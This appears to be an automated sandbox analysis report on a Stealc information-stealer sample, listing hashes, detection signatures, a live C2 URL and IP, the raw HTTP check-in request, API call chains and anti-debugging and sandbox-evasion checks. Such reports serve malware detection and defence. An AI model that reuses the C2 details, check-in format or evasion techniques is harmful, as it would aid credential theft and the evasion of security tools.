
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544998
MD5: b2d5f7c5a51b55bfe094dbe2a60da2e3
SHA1: ace802a1a1b603e5361c2f3a2b4b5361b3358186
SHA256: a117df022325ff641b44e0d81f794e83d259764a0c82e52edb471a89b3f75370
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4460 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B2D5F7C5A51B55BFE094DBE2A60DA2E3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 4460 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 4460 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.f10000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T00:20:03.381251+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.f10000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00F29030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1A2B0 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00F1A2B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00F172A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00F1A210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00F1C920
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F11710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F1DF10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--
Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00F162D0
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/b
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/w
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/wKL
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F50098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6B198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F42138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01364303
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F54288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7E258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013693DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014152DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F9B308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01373567
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F545A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C7441
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F34573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F3E544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136E48C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F996FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F566C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8A648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F86799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6D720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136C92F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7F8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F698B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6B8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F64868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F9CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136781D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136280D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F84BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F80B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01365D47
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8AC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F64DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F65DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F41D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6BD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7AD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F81EE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F58E78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136FFCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128DE5E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012D1EF2
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00F14610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: yhvanrkb ZLIB complexity 0.994987962613293
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00F29790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00F23970
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7W9T3KML.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2133504 > 1048576
Source: file.exe | Static PE information: Raw size of yhvanrkb is bigger than: 0x100000 < 0x19dc00
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.f10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F29BB0
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2149bd should be: 0x20bfe1
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: yhvanrkb
Source: file.exe | Static PE information: section name: owhwljin
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138D064 push edx; mov dword ptr [esp], ebx 0_2_0138D44A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F3A0DC push eax; retf 0_2_00F3A0F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D3176 push eax; mov dword ptr [esp], edi 0_2_013D31E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01420111 push ebp; mov dword ptr [esp], ecx 0_2_01420152
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01420111 push 12BE9830h; mov dword ptr [esp], ebp 0_2_01420195
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01420111 push 6A4B206Ch; mov dword ptr [esp], ebx 0_2_014201DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 527194D0h; mov dword ptr [esp], ebp 0_2_0137216E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 50296553h; mov dword ptr [esp], esp 0_2_01372213
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 0D3E45BCh; mov dword ptr [esp], eax 0_2_0137222F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 7B6F8124h; mov dword ptr [esp], esi 0_2_013722F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 56F78DF1h; mov dword ptr [esp], edx 0_2_01372374
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push eax; mov dword ptr [esp], esp 0_2_01372382
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 2E869085h; mov dword ptr [esp], eax 0_2_013723B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx 0_2_0137241C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 1B37D633h; mov dword ptr [esp], edx 0_2_01372463
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push eax; mov dword ptr [esp], ebx 0_2_0137248C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 2B004513h; mov dword ptr [esp], edi 0_2_013725E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 5E859901h; mov dword ptr [esp], ebp 0_2_0137260D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push edx; mov dword ptr [esp], 6DCAD2DEh 0_2_01372611
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 20941F2Dh; mov dword ptr [esp], ebp 0_2_0137262C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 389D0686h; mov dword ptr [esp], ebx 0_2_0137267F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 2EC98222h; mov dword ptr [esp], esi 0_2_01372691
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 40AABE50h; mov dword ptr [esp], ecx 0_2_01372710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push eax; mov dword ptr [esp], ebx 0_2_0137276E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push edx; mov dword ptr [esp], 37BE06D6h 0_2_0137279B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push edi; mov dword ptr [esp], edx 0_2_0137280B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 42DBE0D3h; mov dword ptr [esp], esp 0_2_01372867
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push eax; mov dword ptr [esp], edx 0_2_01372902
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx 0_2_01372921
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 665D2052h; mov dword ptr [esp], esp 0_2_01372969
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137214E push 5F819381h; mov dword ptr [esp], esi 0_2_01372978
Source: file.exe | Static PE information: section name: yhvanrkb entropy: 7.953026815598935

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F29BB0

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-36218
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FE2F7 second address: 11FDB3C instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop eax
    0x00000005 popad
    0x00000006 mov dword ptr [esp], eax
    0x00000009 pushad
    0x0000000a sbb edx, 1121E984h
    0x00000010 mov dword ptr [ebp+122D2A87h], ebx
    0x00000016 popad
    0x00000017 push dword ptr [ebp+122D01A5h]
    0x0000001d pushad
    0x0000001e mov edi, 24A4AE9Eh
    0x00000023 mov cx, di
    0x00000026 popad
    0x00000027 call dword ptr [ebp+122D22DDh]
    0x0000002d pushad
    0x0000002e jmp 00007F0F04CBD323h
    0x00000033 xor eax, eax
    0x00000035 jng 00007F0F04CBD325h
    0x0000003b mov edx, dword ptr [esp+28h]
    0x0000003f js 00007F0F04CBD31Ch
    0x00000045 xor dword ptr [ebp+122D2ACAh], edx
    0x0000004b mov dword ptr [ebp+122D3820h], eax
    0x00000051 jmp 00007F0F04CBD31Dh
    0x00000056 mov esi, 0000003Ch
    0x0000005b jmp 00007F0F04CBD327h
    0x00000060 add esi, dword ptr [esp+24h]
    0x00000064 xor dword ptr [ebp+122D1875h], edi
    0x0000006a lodsw
    0x0000006c sub dword ptr [ebp+122D1875h], esi
